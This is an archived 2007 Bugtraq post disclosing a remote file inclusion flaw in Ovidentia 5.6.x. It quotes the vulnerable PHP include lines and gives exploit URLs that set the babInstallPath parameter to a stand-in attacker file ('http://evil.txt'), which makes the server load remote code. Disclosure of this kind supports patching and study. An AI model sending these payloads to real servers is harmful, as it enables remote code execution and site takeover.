lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070114151910.32199.qmail@securityfocus.com>
Date: 14 Jan 2007 15:19:10 -0000
From: hotturk@...et.com
To: bugtraq@...urityfocus.com
Subject: Ovidentia 5.6x Series Remote File &#304;nclude

<!--- Product : Ovidentia 5.6.x 
- Website : http://ovidentia.org

- Author : H0tTurk-WebSiteVersion:1.x - Problem : Remote File-->    
include_once $babInstallPath."utilit/mailincl.php";include_once $babInstallPath."utilit/afincl.php";
include_once $babInstallPath."utilit/topincl.php";
include_once $babInstallPath."utilit/artincl.php";include_once $babInstallPath."utilit/vacincl.php";
include_once $babInstallPath."utilit/evtincl.php";
include_once $babInstallPath."utilit/calincl.php";---)
www.victim.com/path/approb.php
?babInstallPath=http://evil.txt? 
www.victim.com/path/index.php?babInstallPath=http://evil.txt
? 
--------------------------------------------------------
Thx:DrMaxVirus,ajann,GencTurk,uykusuz001,Enjexion,PSYCH@,Arabian-FighterZ,Mefisto,SawTurk,Madconfig,SeanPaul
TiT,Salih,HM,Ayyildiz TiMUsers,OzelHarekat/Security

" BUNDAN OTESi Ya IstiKLaL Ya OLUM

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ